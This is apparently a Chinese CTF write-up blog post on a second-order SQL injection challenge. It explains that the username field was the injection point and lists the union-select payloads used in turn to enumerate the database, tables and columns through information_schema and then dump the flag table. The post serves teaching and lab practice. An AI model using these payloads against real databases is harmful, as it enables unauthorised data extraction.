-
October 2019 Twice SQL Injection
目录
总结 :二次注入,首先我们需要锁定是哪里哪个文本框存在二次注入,以这道题为例,首先我以为是登录进去的编辑
打开题目,注册登录,然后登录以后会有一个
然后结合题目,妥妥的二次注入的题目呀
直接进行构造
首先,尝试一下回显位的个数
'union select 1,2# 没回显
'union select 1#
直接发现了回显位置
第二步获取数据库名称
' union select database() # 获得
第三步,获得表名
1' union select group_concat(table_name) from information_schema.tables where database()=table_schema#
flag查询到了表名 flag,news,users
第四步,获得列名
1' union select group_concat(column_name) from information_schema.columns where table_name="flag" #
列名为:flag
最后获取flag
1' union select group_concat(flag) from flag#
总结 :二次注入,首先我们需要锁定是哪里哪个文本框存在二次注入,以这道题为例,首先我以为是登录进去的
首先我认为是这个登陆进去以后的,change这个文本框存在二次注入但是实验了以后发现它存在过滤,然后就继续寻找,最后找到了用户名这个。
-
相关阅读:
《软件定义安全》之六:SDN和NFV安全实践
自定义错误页面
Mysql进阶优化篇06——分组查询优化、分页查询优化、覆盖索引
第一章 数据库绪论
LeetCode 6190. 找到所有好下标
vue2中年份季度选择器(需要安装element)
Kafka+redis分布式锁结合使用心得总结
【随想】每日两题Day.3(实则一题)
【Python】Python语言基础(中)
什么是3322域名?3322域名如何注册?
- 原文地址:https://blog.csdn.net/qq_62046696/article/details/127952939